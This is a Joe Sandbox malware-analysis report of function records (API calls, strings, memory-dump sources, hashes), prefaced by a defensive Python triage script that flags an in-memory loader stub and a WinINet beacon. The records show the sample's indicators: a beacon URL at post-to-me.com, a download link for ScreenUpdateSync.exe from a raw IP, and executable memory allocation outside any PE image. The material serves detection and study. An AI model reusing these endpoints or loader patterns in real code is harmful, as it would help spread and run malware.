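Two of the records in this listing are the ones a triage analyst acts on: the function at 024C003C (VirtualAlloc with MEM_COMMIT/PAGE_READWRITE, VirtualProtect and LoadLibraryA on its graph, the string kernel32.dll, and a memory-dump source marked "based on PE: false", i.e. code that is not backed by a PE on disk) and the function at 00402C27 (InternetOpenW with the agent string ShareScreen followed by InternetOpenUrlW, with https://post-to-me.com/track_prt.php?sub= and &cc=DE among its strings). The Python below is an added example, not part of the Joe Sandbox report or of Joe Sandbox itself: it parses function records in the report's own line format, decodes VirtualAlloc's flag arguments, and flags both behaviours. The VirtualProtect and LoadLibraryA lines in the sample are constructed (the report shows those calls only on the control-flow graph, without arguments) and the loader-stub heuristic is this example's assumption, not a detection the report performs.

```python
"""Triage helper for Joe Sandbox function records.

Added example, not part of the sandbox report or of Joe Sandbox.  It parses the
"APIs" / "Strings" / "Memory Dump Source" lines in the report's format, decodes
VirtualAlloc's flags, and flags two behaviours: a loader stub running from memory
not backed by a PE, and a WinINet beacon with a hard-coded user agent.
"""
import re
from dataclasses import dataclass

# Flag values from winnt.h; only the ones needed to read the report.
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x100000: "MEM_TOP_DOWN"}
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}

API_LINE = re.compile(
    r"•\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
HEX32 = re.compile(r"^[0-9A-Fa-f]{8}$")   # a numeric argument, not a string literal


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: str


@dataclass
class FunctionRecord:
    apis: list
    strings: list
    based_on_pe: bool


def parse_api_line(line):
    """'• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 024C024D' -> ApiCall."""
    m = API_LINE.search(line)
    if not m:
        return None
    args = [a.strip() for a in m["args"].split(",")] if m["args"].strip() else []
    return ApiCall(m["api"], m["module"], args, m["ref"].upper())


def parse_record(text):
    """Collect API calls, the '$'-separated String ID list and the 'based on PE' flag."""
    apis, strings, based_on_pe = [], [], True
    for line in text.splitlines():
        body = line.strip().lstrip("•").strip()
        call = parse_api_line(line)
        if call:
            apis.append(call)
        elif body.startswith("String ID:"):          # skips "API String ID:" (a hash pair)
            strings = [s for s in body[len("String ID:"):].strip().split("$") if s]
        elif "based on PE:" in body:
            based_on_pe = body.rsplit("based on PE:", 1)[1].strip().lower() == "true"
    return FunctionRecord(apis, strings, based_on_pe)


def decode_virtualalloc(call):
    """Name flAllocationType and flProtect; '?' means the sandbox did not resolve the value."""
    if call.api != "VirtualAlloc" or len(call.args) < 4:
        return None
    alloc, prot = call.args[2], call.args[3]
    alloc_names = ["?"] if alloc == "?" else \
        [n for bit, n in MEM_FLAGS.items() if int(alloc, 16) & bit] or [hex(int(alloc, 16))]
    if prot == "?":
        prot_name = "?"
    else:
        v = int(prot, 16)   # low byte is the base protection, 0x100 is the PAGE_GUARD modifier
        prot_name = PAGE_PROTECT.get(v & 0xFF, hex(v & 0xFF)) + ("|PAGE_GUARD" if v & 0x100 else "")
    return {"alloc_type": alloc_names, "protect": prot_name}


def flag_loader_stub(rec):
    """Heuristic (this example's assumption): allocate, reprotect and resolve imports
    from memory that the dump marks as not backed by a PE file."""
    seen = {c.api for c in rec.apis}
    return {"VirtualAlloc", "VirtualProtect", "LoadLibraryA"} <= seen and not rec.based_on_pe


def flag_wininet_beacon(rec):
    """Return (user_agent, [urls]) when InternetOpenW with a literal agent feeds InternetOpenUrlW."""
    seen = {c.api for c in rec.apis}
    if "InternetOpenUrlW" not in seen:
        return None
    for c in rec.apis:
        if c.api == "InternetOpenW" and c.args and c.args[0] != "?" and not HEX32.match(c.args[0]):
            return c.args[0], [s for s in rec.strings if s.startswith("http")]
    return None


# Constructed sample records in the report's format.  The VirtualAlloc, InternetOpenW,
# InternetOpenUrlW, String ID and Source File lines are copied from the report; the
# VirtualProtect and LoadLibraryA lines are constructed (the report shows those calls only
# on the graph, without arguments), with ref set to the start of the graph block holding them.
LOADER_TEXT = """\
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 024C024D
• VirtualProtect.KERNEL32(?,?,?,?), ref: 024C02CE
• LoadLibraryA.KERNEL32(?), ref: 024C04E3
• String ID: cess$kernel32.dll
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
"""
BEACON_TEXT = """\
• InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C27
• InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E3A
• String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
• API String ID: 3067768807-1501832161
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
"""
LOADER_RECORD = parse_record(LOADER_TEXT)
BEACON_RECORD = parse_record(BEACON_TEXT)

if __name__ == "__main__":
    print(decode_virtualalloc(LOADER_RECORD.apis[0]))
    print("loader stub:", flag_loader_stub(LOADER_RECORD), flag_loader_stub(BEACON_RECORD))
    print("beacon:", flag_wininet_beacon(BEACON_RECORD))
```

The "based on PE" flag from the Memory Dump Source line is what separates the 024C0000 region from the 00400000 image: the same API triple inside a legitimately mapped module is ordinary loader or packer behaviour, so the heuristic only fires when the code runs from memory that no file on disk accounts for. The beacon check deliberately keys on the literal agent string rather than the hostname, since the URL is assembled from fragments at runtime and only the prefix and the "&cc=DE" suffix survive as static strings.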

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
• String ID:
• API String ID: 1687354797-0
• Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
• Instruction ID: 19e1887bebf86d68050debe7f629b0077f83fb22891cd3fd40adaf63da529dec
• Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
• Instruction Fuzzy Hash: A2214F72C042089ADF15EBE9D845BDEB7F8AF08318F14407FE544B72C2DB7C99448AA9

Control-flow Graph

APIs
• std::_Cnd_initX.LIBCPMT ref: 0040581C
• __Cnd_signal.LIBCPMT ref: 00405828
• std::_Cnd_initX.LIBCPMT ref: 0040583D
• __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00405844
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
• String ID:
• API String ID: 2059591211-0
• Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
• Instruction ID: 35483bd65d518524af9bc0c336ffe1903f30c86e9e3fc9c48514fd729a934722
• Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
• Instruction Fuzzy Hash: 6BF082324007009BE7317762C807B1A77A0AF0031DF10883FF496B69E2CFBDA8544A9D

Control-flow Graph

APIs
• GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
• ExitThread.KERNEL32 ref: 0042DFDA
Strings
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: ErrorExitLastThread
• String ID: F(@
• API String ID: 1611280651-2698495834
• Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
• Instruction ID: 20c869b795d3320417ca4c19bdea27327a86df913c4cc91a2df8cdb03a1abfe5
• Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
• Instruction Fuzzy Hash: E7F0C274A00614AFDB14AFB2E80ABAE3B70FF09715F10056EF4015B392CB796A55DB6C

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 435 42e114-42e11f 436 42e121-42e133 call 42eac9 call 42a59d 435->436 437 42e135-42e148 call 42e0cb 435->437 449 42e185-42e188 436->449 443 42e176 437->443 444 42e14a-42e167 CreateThread 437->444 448 42e178-42e184 call 42e03d 443->448 446 42e189-42e18e 444->446 447 42e169-42e175 GetLastError call 42ea93 444->447 452 42e190-42e193 446->452 453 42e195-42e197 446->453 447->443 448->449 452->453 453->448
APIs
• CreateThread.KERNEL32(?,?,Function_0002DFC0,00000000,?,?), ref: 0042E15D
• GetLastError.KERNEL32(?,?,?,?,?,0040CF0E,00000000,00000000,?,?,00000000,?), ref: 0042E169
• __dosmaperr.LIBCMT ref: 0042E170
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: CreateErrorLastThread__dosmaperr
• String ID:
• API String ID: 2744730728-0
• Opcode ID: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
• Instruction ID: dd8ab9647f30f5a835e394039e4629bb1c045fd9997365d20d72d2d3bd3a9304
• Opcode Fuzzy Hash: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
• Instruction Fuzzy Hash: D601D236200239BBDB159FA3EC059AF7B6AEF81720F40003AF90587210DB358922C7A8

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 456 434755-43476d call 439921 459 434780-434796 SetFilePointerEx 456->459 460 43476f-434774 call 42eac9 456->460 462 4347a7-4347b1 459->462 463 434798-4347a5 GetLastError call 42ea93 459->463 465 43477a-43477e 460->465 464 4347b3-4347c8 462->464 462->465 463->465 468 4347cd-4347d2 464->468 465->468
APIs
• SetFilePointerEx.KERNEL32(00000000,00000000,0040DDD5,00000000,00000002,0040DDD5,00000000,?,?,?,00434804,00000000,00000000,0040DDD5,00000002), ref: 0043478E
• GetLastError.KERNEL32(?,00434804,00000000,00000000,0040DDD5,00000002,?,0042C161,?,00000000,00000000,00000001,?,0040DDD5,?,0042C216), ref: 00434798
• __dosmaperr.LIBCMT ref: 0043479F
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: ErrorFileLastPointer__dosmaperr
• String ID:
• API String ID: 2336955059-0
• Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
• Instruction ID: bcc915797d3e420762720933ca2114d92cc1cd6946a03aaf12616f5971efc3d8
• Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
• Instruction Fuzzy Hash: 01016836710114ABCB148FAADC059EE7B29EFCA730F24020AF81487290EB35ED118B98

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 470 402bad-402bd9 RegCreateKeyExW 471 402bdb-402bed RegSetValueExW 470->471 472 402bef-402bf2 470->472 471->472 473 402bf4-402bf7 RegCloseKey 472->473 474 402bfd-402c03 472->474 473->474
APIs
• RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BCF
• RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BE7
• RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BF7
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: CloseCreateValue
• String ID:
• API String ID: 1818849710-0
• Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
• Instruction ID: 415a99b38b1cf926e07f2752f011508d1a06d6109c2dcef31e57e84081a4d25d
• Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
• Instruction Fuzzy Hash: ABF0B4B650011CFFEB214F94DD89DBBBA7CEB007E9F100175FA01B2150D6B19E009664

Control-flow Graph (rendered graph not recoverable; function starts at 0042E074, with paths through ExitThread, CloseHandle and FreeLibraryAndExitThread)
APIs
  • Part of subcall function 00431F5E: GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
  • Part of subcall function 00431F5E: _free.LIBCMT ref: 00431F98
  • Part of subcall function 00431F5E: SetLastError.KERNEL32(00000000), ref: 00431FCC
• ExitThread.KERNEL32 ref: 0042E086
• CloseHandle.KERNEL32(?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0AE
• FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0C4
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
• String ID:
• API String ID: 1198197534-0
• Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
• Instruction ID: 941e5d7bb2069d1fb9760ffb86e13a1db41397deee20687f00b4917166382ed0
• Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
• Instruction Fuzzy Hash: 1BF054302006347BD735AF27E808A5B7A986F41775F584715FC25C22A1D768DD838659

Control-flow Graph (rendered graph not recoverable; function starts at 0040239E, with paths through DefWindowProcW and PostQuitMessage)
APIs
• DefWindowProcW.USER32(?,?,?,?), ref: 004023C5
• PostQuitMessage.USER32(00000000), ref: 00402563
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: MessagePostProcQuitWindow
• String ID:
• API String ID: 3873111417-0
• Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
• Instruction ID: 43c76da2243f772c6aced19a3fe0e8e69066b3bbdff08d4cabba9d560eb75400
• Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
• Instruction Fuzzy Hash: 02412E25A64340A5E730EFA5BD55B2633B0FF64722F10252BE528DB2B2E3B28540C35E

Control-flow Graph (rendered graph not recoverable; function starts at 0040155A and calls Sleep)
APIs
• Sleep.KERNEL32(00001D1B), ref: 00401562
  • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
  • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
Strings
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: _wcslen$Sleep
• String ID: http://176.113.115.19/ScreenUpdateSync.exe
• API String ID: 3358372957-3120454669
• Opcode ID: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
• Instruction ID: 033e26d6726dec48d9da5d172e0a3ce7e355aee553d479aaec466036f4edd3d7
• Opcode Fuzzy Hash: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
• Instruction Fuzzy Hash: 83319A15A6538094E330CFA0BC95A662330FF64B52F50653BD60CCB2B2E7A18587C35E

APIs
• _wcslen.LIBCMT ref: 0040298F
• __fassign.LIBCMT ref: 0040299F
  • Part of subcall function 00402823: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
• String ID:
• API String ID: 2843524283-0
• Opcode ID: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
• Instruction ID: f5c656a3c742482aaca5e7be5327d781ae1f97b048d34cfcbeac2439ecd5e81b
• Opcode Fuzzy Hash: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
• Instruction Fuzzy Hash: C901D6B1E0021C5ADB25FA25EC46BEE77689B41304F0041BFA605E31C1E9B85E85CAD8

APIs
• SetErrorMode.KERNEL32(00000400,?,?,024C0223,?,?), ref: 024C0E19
• SetErrorMode.KERNEL32(00000000,?,?,024C0223,?,?), ref: 024C0E1E
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
• Instruction ID: 19e3bb3d86d1ccb7e2d50aa8a73f4fa727658f1bcbf078656ba80fd3e822a18e
• Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
• Instruction Fuzzy Hash: 82D01235145128B7D7403A94DC09BDE7B1CDF05B66F108011FB0DD9180C770954046E5

Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
• Instruction ID: 5858c2b1917228bc3ee007884971bc5cb621fb913b3acd2bc442863518e7715d
• Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
• Instruction Fuzzy Hash: 4051D531A00218AFDB10DF59C840BEA7BA1EFC9364F19919AF818AB391C779FD42C754
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: __fread_nolock
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2638373210-0
                                                                                                                                                                                                                                                                    • Opcode ID: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
                                                                                                                                                                                                                                                                    • Instruction ID: e1021867f2ec77c7d2f8cf192b2e918c2079a777806a714b314ab491ad94b1c1
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5831ADB1604312AFC710DF2AC88092ABFA9BF84351F04893EFD4497390D739DA548B8A
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 323602529-0
                                                                                                                                                                                                                                                                    • Opcode ID: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
                                                                                                                                                                                                                                                                    • Instruction ID: a0c314b69e82cee7068a10c27dc1ba61f54dd3d6c342bb4161a68c9c894be626
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B03118B4D002199BDB14EFA5D881AEDBBB4BF08304F5085AEE415B3281DB786A49CF54
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: H_prolog3_catch
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3886170330-0
                                                                                                                                                                                                                                                                    • Opcode ID: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
                                                                                                                                                                                                                                                                    • Instruction ID: b71381d5bc9e259bdf0532d7d2dd1dfab3929909e68e206b89482bd8707b5f49
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F215E70600205DFCB11DF55C580EADBBB5BF48704F14C06EE815AB3A2C778AE50CB94
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: __wsopen_s
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3347428461-0
                                                                                                                                                                                                                                                                    • Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                                                                                                                                                                                                    • Instruction ID: ced19a79aea4b3e33dd998471e9e3f3b23a78e9704dbb7c6d54aa915c2495f90
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3911187590420AAFCF05DF58E94199B7BF4FF4C314F10406AF819AB311D671EA25CBA9
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                                                                                                                    • Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                                                                                                                                                                                                                    • Instruction ID: e101c5f3f91c4e465480e224300ffd561ec2350ede5005b950df212ed8b6fbff
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6F0BE33910008FBCF159E96DC01DDF3B6EEF8D338F100116F91492150DA3ACA21ABA4
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                    • Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                                                                                                                                                                                                                    • Instruction ID: 0777d31d9fa185a8b849a759fdbdb2b75b345829f9b614c7a8fa7ff1ccc7c9d0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AAE0E5313002207FD6303E675D07B5B36489F497A6F042127EC05A23D0DA6DEE0085AD
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004103C7
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Exception@8Throw
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2005118841-0
                                                                                                                                                                                                                                                                    • Opcode ID: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
                                                                                                                                                                                                                                                                    • Instruction ID: a93cbdcc7b8cec239d3e65b0583cf012edeaa99edf8fc6fd77b2b60b17382ec4
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 58E09B3450430E76CB1476A5FC1595D376C6A00354B904237BC28654D1DF78F59D858D
                                                                                                                                                                                                                                                                    APIs
• CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
• Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
• Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
• Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95
APIs
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 009F9C56
Memory Dump Source
• Source File: 00000000.00000002.4623077365.00000000009F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 009F9000, based on PE: false
